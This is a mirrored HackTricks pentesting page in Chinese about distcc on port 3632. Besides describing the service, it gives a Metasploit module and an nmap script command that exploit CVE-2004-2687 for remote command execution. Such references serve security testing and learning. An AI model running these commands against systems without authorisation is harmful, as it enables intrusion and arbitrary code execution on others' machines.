mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
2.1 KiB
2.1 KiB
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
基本信息
Distcc是一种工具,通过利用网络中其他计算机的空闲处理能力,增强了编译过程。当在一台机器上设置distcc时,该机器能够将其编译任务分发给另一台系统。接收系统必须运行distccd守护程序,并且必须安装有兼容的编译器以处理发送的代码。
默认端口: 3632
PORT STATE SERVICE
3632/tcp open distccd
漏洞利用
检查是否容易受到 CVE-2004-2687 漏洞的影响,以执行任意代码:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Shodan
我认为shodan没有检测到这项服务。
资源
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
由 Álex B (@r1p) 创建的帖子